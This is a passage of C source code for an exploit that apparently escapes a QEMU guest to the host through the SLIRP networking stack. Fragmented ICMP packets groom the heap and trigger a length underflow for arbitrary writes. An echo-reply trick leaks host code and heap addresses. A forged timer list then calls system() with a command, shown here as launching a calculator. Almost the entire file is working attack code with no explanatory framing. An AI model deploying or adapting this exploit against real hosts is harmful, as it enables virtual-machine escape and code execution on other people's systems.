|
|
size_t timers_done_ev;
|
|
};
|
|
|
|
|
|
|
|
// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
|
|
|
|
int raw_socket;
|
|
int recv_socket;
|
|
int spray_id;
|
|
int idx;
|
|
char mac[6];
|
|
|
|
void * code_leak;
|
|
void * heap_leak;
|
|
|
|
void *Malloc(size_t size) {
|
|
void * ptr = calloc(size,1);
|
|
if (!ptr) {
|
|
die("malloc() failed to allocate");
|
|
}
|
|
return ptr;
|
|
}
|
|
|
|
unsigned short in_cksum(unsigned short *ptr,int nbytes) {
|
|
|
|
register long sum; /* assumes long == 32 bits */
|
|
u_short oddbyte;
|
|
register u_short answer; /* assumes u_short == 16 bits */
|
|
|
|
/*
|
|
* Our algorithm is simple, using a 32-bit accumulator (sum),
|
|
* we add sequential 16-bit words to it, and at the end, fold back
|
|
* all the carry bits from the top 16 bits into the lower 16 bits.
|
|
*/
|
|
|
|
sum = 0;
|
|
while (nbytes > 1) {
|
|
sum += *ptr++;
|
|
nbytes -= 2;
|
|
}
|
|
|
|
/* mop up an odd byte, if necessary */
|
|
if (nbytes == 1) {
|
|
oddbyte = 0; /* make sure top half is zero */
|
|
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
|
|
sum += oddbyte;
|
|
}
|
|
|
|
/*
|
|
* Add back carry outs from top 16 bits to low 16 bits.
|
|
*/
|
|
|
|
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
|
|
sum += (sum >> 16); /* add carry */
|
|
answer = ~sum; /* ones-complement, then truncate to 16 bits */
|
|
return(answer);
|
|
}
|
|
|
|
void hex_dump(char *desc, void *addr, int len)
|
|
{
|
|
int i;
|
|
unsigned char buff[17];
|
|
unsigned char *pc = (unsigned char*)addr;
|
|
if (desc != NULL)
|
|
printf ("%s:\n", desc);
|
|
for (i = 0; i < len; i++) {
|
|
if ((i % 16) == 0) {
|
|
if (i != 0)
|
|
printf(" %s\n", buff);
|
|
printf(" %04x ", i);
|
|
}
|
|
printf(" %02x", pc[i]);
|
|
if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
|
|
buff[i % 16] = '.';
|
|
} else {
|
|
buff[i % 16] = pc[i];
|
|
}
|
|
buff[(i % 16) + 1] = '\0';
|
|
}
|
|
while ((i % 16) != 0) {
|
|
printf(" ");
|
|
i++;
|
|
}
|
|
printf(" %s\n", buff);
|
|
}
|
|
|
|
char * ethernet_header(char * eth_hdr){
|
|
|
|
/* src MAC : 52:54:00:12:34:56 */
|
|
memcpy(ð_hdr[6],mac,6);
|
|
|
|
// Next is ethernet type code (ETH_P_IP for IPv4).
|
|
// http://www.iana.org/assignments/ethernet-numbers
|
|
eth_hdr[12] = ETH_P_IP / 256;
|
|
eth_hdr[13] = ETH_P_IP % 256;
|
|
return eth_hdr;
|
|
}
|
|
|
|
void ip_header(struct iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
|
|
u_int8_t protocol,u_int16_t id,uint16_t frag_off){
|
|
|
|
/* rfc791 */
|
|
ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
|
|
ip->version = 4;
|
|
ip->tos = 0x0;
|
|
ip->tot_len = htons(IP4_HDRLEN + payload_len);
|
|
ip->id = htons(id);
|
|
ip->ttl = 64;
|
|
ip->frag_off = htons(frag_off);
|
|
ip->protocol = protocol;
|
|
ip->saddr = src_addr;
|
|
ip->daddr = dst_addr;
|
|
ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
|
|
}
|
|
|
|
void icmp_header(struct icmphdr *icmp, char *data, size_t size) {
|
|
|
|
/* rfc792 */
|
|
icmp->type = ICMP_ECHO;
|
|
icmp->code = 0;
|
|
icmp->un.echo.id = htons(0);
|
|
icmp->un.echo.sequence = htons(0);
|
|
if (data) {
|
|
char * payload = (char * )icmp+ ICMP_HDRLEN;
|
|
memcpy(payload, data, size);
|
|
}
|
|
|
|
icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);
|
|
|
|
}
|
|
|
|
void send_pkt(char *frame, u_int32_t frame_length) {
|
|
|
|
struct sockaddr_ll sock;
|
|
sock.sll_family = AF_PACKET;
|
|
sock.sll_ifindex = idx;
|
|
sock.sll_halen = 6;
|
|
memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));
|
|
|
|
if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
|
|
sizeof(sock))<0)
|
|
die("sendto()");
|
|
}
|
|
|
|
void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
|
|
|
|
u_int32_t src_addr, dst_addr;
|
|
src_addr = inet_addr(SRC_ADDR);
|
|
dst_addr = inet_addr(DST_ADDR);
|
|
|
|
char * pkt = Malloc(IP_MAXPACKET);
|
|
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
|
|
ethernet_header(pkt);
|
|
u_int16_t payload_len = size;
|
|
ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);
|
|
|
|
if(data) {
|
|
char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
|
|
memcpy(payload, data, payload_len);
|
|
}
|
|
|
|
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
|
|
send_pkt(pkt,frame_length);
|
|
free(pkt);
|
|
}
|
|
|
|
void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
|
|
|
|
char * pkt = Malloc(IP_MAXPACKET);
|
|
struct icmphdr * icmp = (struct icmphdr * )(pkt);
|
|
|
|
if(!data)
|
|
data = Malloc(size);
|
|
icmp_header(icmp,data,size);
|
|
|
|
u_int32_t len = ICMP_HDRLEN + size;
|
|
send_ip4(id,len,pkt,frag_off);
|
|
free(pkt);
|
|
}
|
|
|
|
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
|
|
|
|
void initialize() {
|
|
int sd;
|
|
struct ifreq ifr;
|
|
char interface[40];
|
|
int mtu;
|
|
|
|
srand(time(NULL));
|
|
strcpy (interface, INTERFACE);
|
|
|
|
// Submit request for a socket descriptor to look up interface.
|
|
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
|
|
die("socket() failed to get socket descriptor for using ioctl()");
|
|
}
|
|
// Use ioctl() to get interface maximum transmission unit (MTU).
|
|
memset (&ifr, 0, sizeof (ifr));
|
|
strcpy (ifr.ifr_name, interface);
|
|
if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
|
|
die("ioctl() failed to get MTU ");
|
|
}
|
|
mtu = ifr.ifr_mtu;
|
|
printf ("MTU of interface %s : %i\n", interface, mtu);
|
|
if (mtu < MIN_MTU) {
|
|
printf("Run\n$ ip link set dev %s mtu 12000\n",interface);
|
|
die("");
|
|
}
|
|
|
|
// Use ioctl() to look up interface name and get its MAC address.
|
|
memset (&ifr, 0, sizeof (ifr));
|
|
snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
|
|
if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
|
|
die("ioctl() failed to get source MAC address ");
|
|
}
|
|
memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
|
|
printf ("MAC %s :", interface);
|
|
for (int i=0; i<5; i++) {
|
|
printf ("%02x:", mac[i]);
|
|
}
|
|
printf ("%02x\n", mac[5]);
|
|
|
|
// Use ioctl() to look up interface index which we will use to
|
|
// bind socket descriptor sd to specified interface with setsockopt() since
|
|
// none of the other arguments of sendto() specify which interface to use.
|
|
memset (&ifr, 0, sizeof (ifr));
|
|
snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
|
|
if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
|
|
die("ioctl() failed to find interface ");
|
|
}
|
|
|
|
close (sd);
|
|
printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
|
|
idx = ifr.ifr_ifindex;
|
|
|
|
if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
|
|
die("socket() failed to obtain raw socket");
|
|
|
|
|
|
/* Bind socket to interface index. */
|
|
if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
|
|
die("setsockopt() failed to bind to interface ");
|
|
}
|
|
|
|
printf("Initialized socket discriptors\n");
|
|
}
|
|
|
|
|
|
void spray(uint32_t size, u_int32_t count) {
|
|
printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
|
|
int s;
|
|
u_int16_t frag_off;
|
|
char * data;
|
|
|
|
for (int i = 0; i < count; i++) {
|
|
send_icmp(spray_id + i,size, NULL, IP_MF);
|
|
}
|
|
}
|
|
|
|
void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
|
|
size_t spray_count) {
|
|
|
|
spray(0x8, spray_count);
|
|
|
|
|
|
size_t id = spray_id + spray_count;
|
|
// Target
|
|
size_t target_id = id++;
|
|
send_ip4(target_id, 0x8, NULL, IP_MF);
|
|
|
|
|
|
// Padding
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
|
|
// Piviot Point
|
|
size_t hole_1 = id++;
|
|
send_ip4(hole_1, 0x8, NULL, IP_MF);
|
|
|
|
|
|
// Padding
|
|
send_ip4(id++, 0xC30, NULL, IP_MF);
|
|
|
|
// For creating hole
|
|
size_t hole_2 = id++;
|
|
send_ip4(hole_2, 0x8, NULL, IP_MF);
|
|
|
|
// To prevent consolidation
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
|
|
// This should create the fist hole
|
|
send_ip4(hole_1, 0x8, NULL, 0x1);
|
|
|
|
// This should create the second hole
|
|
send_ip4(hole_2, 0x8, NULL, 0x1);
|
|
|
|
int m_data_off = -0x70;
|
|
int m_len = m_data_off;
|
|
addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
|
|
if (addrlen != 0x8) {
|
|
m_len -= (0x8 - addrlen);
|
|
}
|
|
|
|
size_t vuln_id = id++;
|
|
|
|
char * pkt = Malloc(IP_MAXPACKET);
|
|
memset(pkt,0x0,IP_MAXPACKET);
|
|
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
ethernet_header(pkt);
|
|
|
|
u_int16_t pkt_len = 0xc90;
|
|
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
|
|
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
|
|
|
|
// The mbuf of this packet will be placed in the second hole and
|
|
// m_ext buff will be placed on the first hole, We will write wrt
|
|
// to this.
|
|
send_pkt(pkt,frame_length);
|
|
|
|
memset(pkt,0x0,IP_MAXPACKET);
|
|
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
ethernet_header(pkt);
|
|
pkt_len = 0x8;
|
|
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
|
|
frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
|
|
|
|
// Trigger the bug to change target's m_len
|
|
send_pkt(pkt,frame_length);
|
|
|
|
|
|
// Underflow and write, to change m_data
|
|
char addr_buf[0x8] = {0};
|
|
if (addrlen != 0x8) {
|
|
memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
|
|
} else {
|
|
memcpy(addr_buf,(char *)&addr,8);
|
|
}
|
|
send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
|
|
send_ip4(target_id, size, payload, 0x2);
|
|
|
|
hex_dump("Writing Payload ", payload, size);
|
|
}
|
|
|
|
|
|
void recv_leaks(){
|
|
/* Prepare recv sd */
|
|
/* Submit request for a raw socket descriptor to receive packets. */
|
|
int recvsd, fromlen, bytes, status;
|
|
struct sockaddr from;
|
|
char recv_ether_frame[IP_MAXPACKET];
|
|
struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
|
|
struct icmphdr *recv_icmphdr =
|
|
(struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
|
|
|
|
for (;;) {
|
|
|
|
memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
|
|
memset(&from, 0, sizeof(from));
|
|
fromlen = sizeof(from);
|
|
if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
|
|
(struct sockaddr *)&from, (socklen_t *)&fromlen)) <
|
|
0) {
|
|
status = errno;
|
|
// Deal with error conditions first.
|
|
if (status == EAGAIN) { // EAGAIN = 11
|
|
printf("Time out\n");
|
|
} else if (status == EINTR) { // EINTR = 4
|
|
continue; // Something weird happened, but let's keep listening.
|
|
} else {
|
|
perror("recvfrom() failed ");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
} // End of error handling conditionals.
|
|
|
|
// Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
|
|
// and keep listening.
|
|
if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
|
|
(recv_iphdr->protocol == IPPROTO_ICMP) &&
|
|
(recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
|
|
(recv_icmphdr->checksum == 0xffff)) {
|
|
hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);
|
|
|
|
code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
|
|
size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
|
|
for (int i = 0; i < (bytes / 0x8); i++) {
|
|
if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
|
|
heap_leak = (void *)(ptr[i] & 0xffffff000000);
|
|
break;
|
|
}
|
|
}
|
|
|
|
printf("Host Code Leak : %p\n", code_leak);
|
|
printf("Host Heap Leak : %p\n", heap_leak);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
void leak() {
|
|
u_int32_t src_addr, dst_addr;
|
|
src_addr = inet_addr(SRC_ADDR);
|
|
dst_addr = inet_addr(DST_ADDR);
|
|
|
|
/* Crafting Fake ICMP Packet For Leak */
|
|
char * pkt = Malloc(IP_MAXPACKET);
|
|
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
|
|
ethernet_header(pkt);
|
|
ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);
|
|
|
|
ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
|
|
ip->id = ntohs(ip->id);
|
|
ip->frag_off = htons(ip->frag_off);
|
|
|
|
icmp_header(icmp,NULL,0x0);
|
|
char * data = (char *)icmp + ICMP_HDRLEN + 8;
|
|
size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;
|
|
|
|
spray_id = rand() & 0xffff;
|
|
arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);
|
|
|
|
// This is same as the arbitrary write function
|
|
spray_id = rand() & 0xffff;
|
|
spray(0x8, 0x20);
|
|
size_t id = spray_id + 0x20;
|
|
|
|
size_t replay_id = id++;
|
|
send_ip4(replay_id, 0x100, NULL, IP_MF);
|
|
|
|
// Target
|
|
size_t target_id = id++;
|
|
send_ip4(target_id, 0x8, NULL, IP_MF);
|
|
|
|
|
|
// Padding
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
|
|
// Piviot Point
|
|
size_t hole_1 = id++;
|
|
send_ip4(hole_1, 0x8, NULL, IP_MF);
|
|
|
|
|
|
// Padding
|
|
send_ip4(id++, 0xC30, NULL, IP_MF);
|
|
|
|
// For creating hole
|
|
size_t hole_2 = id++;
|
|
send_ip4(hole_2, 0x8, NULL, IP_MF);
|
|
|
|
// Prevent Consolidation
|
|
send_ip4(id++, 0x8, NULL, IP_MF);
|
|
|
|
// This should create the fist hole
|
|
send_ip4(hole_1, 0x8, NULL, 0x1);
|
|
|
|
// This should create the second hole
|
|
send_ip4(hole_2, 0x8, NULL, 0x1);
|
|
|
|
// Trigger the bug to change target's m_len
|
|
int m_data_off = -0xd50;
|
|
int m_len = m_data_off;
|
|
size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe + 6) ;
|
|
size_t addrlen = 0x3;
|
|
|
|
if (addrlen != 0x8) {
|
|
m_len -= (0x8 - addrlen);
|
|
}
|
|
|
|
size_t vuln_id = id++;
|
|
|
|
memset(pkt,0x0,IP_MAXPACKET);
|
|
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
ethernet_header(pkt);
|
|
|
|
pkt_len = 0xc90;
|
|
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
|
|
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
|
|
send_pkt(pkt,frame_length);
|
|
|
|
|
|
memset(pkt,0x0,IP_MAXPACKET);
|
|
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
|
|
ethernet_header(pkt);
|
|
pkt_len = 0x8;
|
|
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
|
|
frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
|
|
send_pkt(pkt,frame_length);
|
|
|
|
|
|
// Underflow and write to change m_data
|
|
char addr_buf[0x8] = {0};
|
|
if (addrlen != 0x8) {
|
|
memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
|
|
} else {
|
|
memcpy(addr_buf,(char *)&addr,8);
|
|
}
|
|
send_ip4(target_id, 0x8, addr_buf, 0x1);
|
|
|
|
if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
|
|
die("socket() failed to obtain a receive socket descriptor");
|
|
send_ip4(replay_id, 0x8, NULL, 0x20);
|
|
recv_leaks();
|
|
|
|
|
|
char zero[0x28] = {0};
|
|
spray_id = rand() & 0xffff;
|
|
printf("Cleaning Heap\n");
|
|
arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
|
|
}
|
|
|
|
|
|
void pwn() {
|
|
char payload[0x200] = {0};
|
|
struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
|
|
struct QEMUTimer *ts =
|
|
(struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));
|
|
|
|
char cmd[] = "/usr/bin/gnome-calculator";
|
|
memcpy((void *)(payload + sizeof(struct QEMUTimerList ) \
|
|
+sizeof(struct QEMUTimer )), \
|
|
(void *)cmd,sizeof(cmd));
|
|
|
|
void * fake_timer_list = code_leak + FAKE_STRUCT;
|
|
void * fake_timer = fake_timer_list + sizeof(struct QEMUTimerList);
|
|
|
|
void *system = code_leak + SYSTEM_PLT;
|
|
void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
|
|
/* Fake Timer List */
|
|
tl->clock = (void *)(code_leak + QEMU_CLOCK);
|
|
*(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
|
|
tl->active_timers = fake_timer;
|
|
tl->le_next = 0x0;
|
|
tl->le_prev = 0x0;
|
|
tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
|
|
tl->notify_opaque = 0x0;
|
|
tl->timers_done_ev = 0x0000000100000000;
|
|
|
|
/*Fake Timer structure*/
|
|
ts->timer_list = fake_timer_list;
|
|
ts->cb = system;
|
|
ts->opaque = cmd_addr;
|
|
ts->scale = 1000000;
|
|
ts->expire_time = -1;
|
|
|
|
spray_id = rand() & 0xffff;
|
|
size_t payload_size =
|
|
sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);
|
|
|
|
printf("Writing fake structure : %p\n",fake_timer_list);
|
|
arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);
|
|
|
|
spray_id = rand() & 0xffff;
|
|
void * main_loop_tlg = code_leak + MAIN_LOOP_TLG;
|
|
printf("Overwriting main_loop_tlg %p\n",main_loop_tlg);
|
|
arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
|
|
}
|
|
|
|
int main() {
|
|
initialize();
|
|
leak();
|
|
pwn();
|
|
return 0;
|
|
} |